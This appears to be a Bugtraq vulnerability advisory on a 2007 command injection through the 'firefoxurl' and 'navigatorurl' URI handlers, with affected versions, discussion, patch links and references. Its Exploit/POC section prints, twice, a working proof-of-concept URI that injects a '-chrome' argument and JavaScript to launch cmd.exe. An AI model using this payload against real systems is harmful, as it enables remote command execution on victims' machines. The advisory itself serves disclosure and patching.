Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability
BID:24837
Info
Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability
| Bugtraq ID: | 24837 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-3670 CVE-2007-4038 |
| Remote: | Yes |
| Local: | No |
| Published: | Jul 10 2007 12:00AM |
| Updated: | Mar 19 2015 08:22AM |
| Credit: | Thor Larholm reported this issue for Internet Explorer. Greg Macanus reported this issue for Mozilla Firefox. Nathan McFeters discovered that 'navigatorurl' is also affected. Billy Rios is also credited with the discovery of this issue. |
| Vulnerable: |
Ubuntu Ubuntu Linux 7.04 sparc Ubuntu Ubuntu Linux 7.04 powerpc Ubuntu Ubuntu Linux 7.04 i386 Ubuntu Ubuntu Linux 7.04 amd64 Ubuntu Ubuntu Linux 6.10 sparc Ubuntu Ubuntu Linux 6.10 powerpc Ubuntu Ubuntu Linux 6.10 i386 Ubuntu Ubuntu Linux 6.10 amd64 Ubuntu Ubuntu Linux 6.06 LTS sparc Ubuntu Ubuntu Linux 6.06 LTS powerpc Ubuntu Ubuntu Linux 6.06 LTS i386 Ubuntu Ubuntu Linux 6.06 LTS amd64 SuSE SUSE Linux Enterprise Server 8 SuSE SUSE Linux Enterprise Server 10 SP1 SuSE SUSE Linux Enterprise Server 10 SuSE SUSE Linux Enterprise Desktop 10 SP1 SuSE SUSE Linux Enterprise Desktop 10 Slackware Linux 12.0 Slackware Linux 11.0 S.u.S.E. UnitedLinux 1.0 S.u.S.E. SuSE Linux Standard Server 8.0 S.u.S.E. SuSE Linux School Server for i386 S.u.S.E. SUSE LINUX Retail Solution 8.0 S.u.S.E. SuSE Linux Openexchange Server 4.0 S.u.S.E. openSUSE 10.2 S.u.S.E. Open-Enterprise-Server 0 S.u.S.E. Novell Linux POS 9 S.u.S.E. Novell Linux Desktop 9.0 S.u.S.E. Linux Professional 10.0 OSS S.u.S.E. Linux Professional 10.0 S.u.S.E. Linux Professional 10.1 S.u.S.E. Linux Personal 10.0 OSS S.u.S.E. Linux Personal 10.1 S.u.S.E. Linux Desktop 10 S.u.S.E. Linux 10.1 x86-64 S.u.S.E. Linux 10.1 x86 S.u.S.E. Linux 10.1 ppc S.u.S.E. Linux 10.0 x86-64 S.u.S.E. Linux 10.0 x86 S.u.S.E. Linux 10.0 ppc Netscape Navigator 9.0 Mozilla Thunderbird 2.0 .4 Mozilla Thunderbird 1.5 beta 2 Mozilla Thunderbird 1.5 .9 Mozilla Thunderbird 1.5 .13 Mozilla Thunderbird 1.5 Mozilla Thunderbird 1.5.0.8 Mozilla Thunderbird 1.5.0.7 Mozilla Thunderbird 1.5.0.5 Mozilla Thunderbird 1.5.0.4 Mozilla Thunderbird 1.5.0.2 Mozilla Thunderbird 1.5.0.12 Mozilla Thunderbird 1.5.0.10 Mozilla Thunderbird 1.5.0.1 Mozilla SeaMonkey 1.1.3 Mozilla SeaMonkey 1.1.2 Mozilla SeaMonkey 1.1.1 Mozilla SeaMonkey 1.1 beta Mozilla Firefox 2.0 .4 Mozilla Firefox 2.0 .3 Mozilla Firefox 2.0 .1 Mozilla Firefox 2.0.0.2 Mozilla Firefox 2.0 RC3 Mozilla Firefox 2.0 RC2 Mozilla Firefox 2.0 beta 1 Mozilla Firefox 2.0 Mozilla Camino 1.0.3 Mozilla Camino 1.0.2 Mozilla Camino 1.0.1 Mozilla Camino 0.8.4 Mozilla Camino 0.8.3 Mozilla Camino 0.8 Mozilla Camino 0.7 .0 Mozilla Camino 1.5 Mozilla Camino 1.0 Microsoft Internet Explorer 7.0 beta3 Microsoft Internet Explorer 7.0 beta2 Microsoft Internet Explorer 7.0 beta1 Microsoft Internet Explorer 7.0 Microsoft Internet Explorer 6.0 SP1 Microsoft Internet Explorer 6.0 Mandriva Linux Mandrake 2007.1 x86_64 Mandriva Linux Mandrake 2007.1 Mandriva Linux Mandrake 2007.0 x86_64 Mandriva Linux Mandrake 2007.0 MandrakeSoft Corporate Server 4.0 x86_64 MandrakeSoft Corporate Server 3.0 x86_64 MandrakeSoft Corporate Server 3.0 MandrakeSoft Corporate Server 4.0 HP HP-UX B.11.31 HP HP-UX B.11.23 HP HP-UX B.11.11 Google Chrome 0.2.149 .30 Google Chrome 0.2.149 .29 Google Chrome 0.2.149 .27 Google Chrome 1.0.154.46 Google Chrome 1.0.154.36 |
| Not Vulnerable: |
Mozilla Thunderbird 2.0 .5 Mozilla Thunderbird 1.5.0.14 Mozilla SeaMonkey 1.1.4 Mozilla Firefox 2.0 .5 Mozilla Camino 1.5.1 Google Chrome 1.0.154.48 |
Discussion
Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability
Microsoft Internet Explorer, Mozilla Firefox and Netscape Navigator are prone to a vulnerability that lets attackers inject commands through the 'firefoxurl' and 'navigatorurl' protocol handlers.
Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through the 'firefox.exe' and 'navigator.exe' processes by employing the 'firefoxurl' and 'navigatorurl' handlers.
An attacker can also employ these issues to carry out cross-browser scripting attacks by using the '-chrome' argument. This can allow the attacker to run JavaScript code with the privileges of trusted Chrome context and gain full access to Firefox and Netscape Navigator's resources.
Exploiting these issues would permit remote attackers to influence command options that can be called through the 'firefoxurl' and 'navigatorurl' handlers and therefore execute commands and script code with the privileges of a user running the applications. Successful attacks may result in a variety of consequences, including remote unauthorized access.
Microsoft Internet Explorer, Mozilla Firefox and Netscape Navigator are prone to a vulnerability that lets attackers inject commands through the 'firefoxurl' and 'navigatorurl' protocol handlers.
Exploiting these issues allows remote attackers to pass and execute arbitrary commands and arguments through the 'firefox.exe' and 'navigator.exe' processes by employing the 'firefoxurl' and 'navigatorurl' handlers.
An attacker can also employ these issues to carry out cross-browser scripting attacks by using the '-chrome' argument. This can allow the attacker to run JavaScript code with the privileges of trusted Chrome context and gain full access to Firefox and Netscape Navigator's resources.
Exploiting these issues would permit remote attackers to influence command options that can be called through the 'firefoxurl' and 'navigatorurl' handlers and therefore execute commands and script code with the privileges of a user running the applications. Successful attacks may result in a variety of consequences, including remote unauthorized access.
Exploit / POC
Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability
The following proof of concept demonstrates this vulnerability:
http://larholm.com/vuln/firefoxurl.html
The following proof-of-concept URI demonstrates this issue with the 'navigatorurl' URI handler:
navigatorurl:test"%20-chrome%20"javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
The following proof of concept demonstrates this vulnerability:
http://larholm.com/vuln/firefoxurl.html
The following proof-of-concept URI demonstrates this issue with the 'navigatorurl' URI handler:
navigatorurl:test"%20-chrome%20"javascript:C=Components.classes;I=Components.interfaces;file=C['@mozilla.org/file/local;1'].createInstance(I.nsILocalFile);file.initWithPath('C:'+String.fromCharCode(92)+String.fromCharCode(92)+'Windows'+String.fromCharCode(92)+String.fromCharCode(92)+'System32'+String.fromCharCode(92)+String.fromCharCode(92)+'cmd.exe');process=C['@mozilla.org/process/util;1'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process)
UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.
Solution / Fix
Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability
Solution:
Mozilla has addressed this vulnerability in Firefox and Thunderbird. The vendor has released Firefox 2.0.0.5 and Thunderbird 2.0.0.5 to fix this issue. Please see the references for more information.
NOTE: Microsoft has released a report on this issue, stating that it is not the responsibility of the calling application to encode or otherwise escape characters passed to protocol handlers. Please see the referenced MSDN article for more information.
NOTE: This issue was not correctly fixed Thunderbird 1.5.0.13 installed through automatic updates. The vendor released Thunderbird 1.5.0.14 to resolve this issue. Please see the referenced Mozilla advisories for more information.
Slackware Linux 12.0
Mozilla Firefox 2.0 RC2
Mozilla Firefox 2.0 beta 1
Mozilla Camino 1.0
Mozilla Camino 1.5
Mozilla Firefox 2.0.0.2
Mozilla Firefox 2.0
Mozilla Camino 0.7 .0
Mozilla Camino 0.8
Mozilla Camino 0.8.3
Mozilla Camino 1.0.1
Mozilla Camino 1.0.2
Mozilla Camino 1.0.3
Mozilla Thunderbird 2.0 .4
Mozilla Firefox 2.0 .1
Mozilla Firefox 2.0 .3
Solution:
Mozilla has addressed this vulnerability in Firefox and Thunderbird. The vendor has released Firefox 2.0.0.5 and Thunderbird 2.0.0.5 to fix this issue. Please see the references for more information.
NOTE: Microsoft has released a report on this issue, stating that it is not the responsibility of the calling application to encode or otherwise escape characters passed to protocol handlers. Please see the referenced MSDN article for more information.
NOTE: This issue was not correctly fixed Thunderbird 1.5.0.13 installed through automatic updates. The vendor released Thunderbird 1.5.0.14 to resolve this issue. Please see the referenced Mozilla advisories for more information.
Slackware Linux 12.0
-
Slackware mozilla-firefox-2.0.0.5-i686-1.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/ mozilla-firefox-2.0.0.5-i686-1.tgz -
Slackware mozilla-thunderbird-2.0.0.5-i686-1.tgz
ftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/ mozilla-thunderbird-2.0.0.5-i686-1.tgz -
Slackware Updated packages for Slackware 12.0:
ftp://ftp.slackware.com/pub/slackware/slackware-12.0/patches/packages/ mozilla-firefox-2.0.0.6-i686-1.tgz
Mozilla Firefox 2.0 RC2
-
Mozilla Firefox 2.0.0.5
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.5
Mozilla Firefox 2.0 beta 1
-
Mozilla Firefox 2.0.0.5
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.5
Mozilla Camino 1.0
-
Mozilla camino-1.5.1
http://download.mozilla.org/?product=camino-1.5.1&os=osx&lang=en-US
Mozilla Camino 1.5
-
Mozilla camino-1.5.1
http://download.mozilla.org/?product=camino-1.5.1&os=osx&lang=en-US
Mozilla Firefox 2.0.0.2
-
Mozilla Firefox 2.0.0.5
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.5
Mozilla Firefox 2.0
-
Mozilla Firefox 2.0.0.5
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.5
Mozilla Camino 0.7 .0
-
Mozilla camino-1.5.1
http://download.mozilla.org/?product=camino-1.5.1&os=osx&lang=en-US
Mozilla Camino 0.8
-
Mozilla camino-1.5.1
http://download.mozilla.org/?product=camino-1.5.1&os=osx&lang=en-US
Mozilla Camino 0.8.3
-
Mozilla camino-1.5.1
http://download.mozilla.org/?product=camino-1.5.1&os=osx&lang=en-US
Mozilla Camino 1.0.1
-
Mozilla camino-1.5.1
http://download.mozilla.org/?product=camino-1.5.1&os=osx&lang=en-US
Mozilla Camino 1.0.2
-
Mozilla camino-1.5.1
http://download.mozilla.org/?product=camino-1.5.1&os=osx&lang=en-US
Mozilla Camino 1.0.3
-
Mozilla camino-1.5.1
http://download.mozilla.org/?product=camino-1.5.1&os=osx&lang=en-US
Mozilla Thunderbird 2.0 .4
-
Mozilla Thunderbird 2.0.0.5
ftp://ftp.mozilla.org/pub/mozilla.org/thunderbird/releases/latest-2.0
Mozilla Firefox 2.0 .1
-
Mozilla Firefox 2.0.0.5
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.5
Mozilla Firefox 2.0 .3
-
Mozilla Firefox 2.0.0.5
ftp://ftp.mozilla.org/pub/mozilla.org/firefox/releases/2.0.0.5
References
Microsoft Internet Explorer and Mozilla Firefox URI Handler Command Injection Vulnerability
References:
References:
- Mozilla Protocol Abuse (Thor Larholm)
- Thunderbird 1.5 has not been patched with osint (Thor Larholm)
- 1.5.1 Release Notes (Camino)
- Cross Browser Scripting 2 (IE pwns Netscape Navigator 9) (sla.ckers.org)
- Internet Explorer 0day Exploit (Thor Larholm)
- Internet Explorer Homepage (Microsoft)
- Mozilla Foundation Security Advisory 2007-23 (Mozilla)
- Mozilla Foundation Security Advisory 2007-40 (Mozilla)
- Registering an Application to a URL Protocol (Microsoft)
- Release 1.0.154.48 (Google)
- Security Issue in URL Protocol Handling on Windows (Mozilla)
- Security update for MozillaFirefox SuSE Linux Maintenance Web (07d098f99c9fe6956 (Novell)
- Thunderbird 1.5.0.14 Release Notes (Mozilla)
- iDefense Security Advisory 07.19.07: Multiple Vendor Multiple Product URI Handle ([email protected])
- Internet Explorer 0day exploit (Thor Larholm)
- HPSBUX02156 SSRT061236 rev.4 - HP-UX Running Thunderbird, Remote Unauthorized Ac (HP)
- Multiple Vendor Multiple Product URI Handler Input Validation Vulnerability (iDefense Labs)
- Vulnerability Note VU#358017 Mozilla Firefox URL protocol handling vulnerability (US-CERT)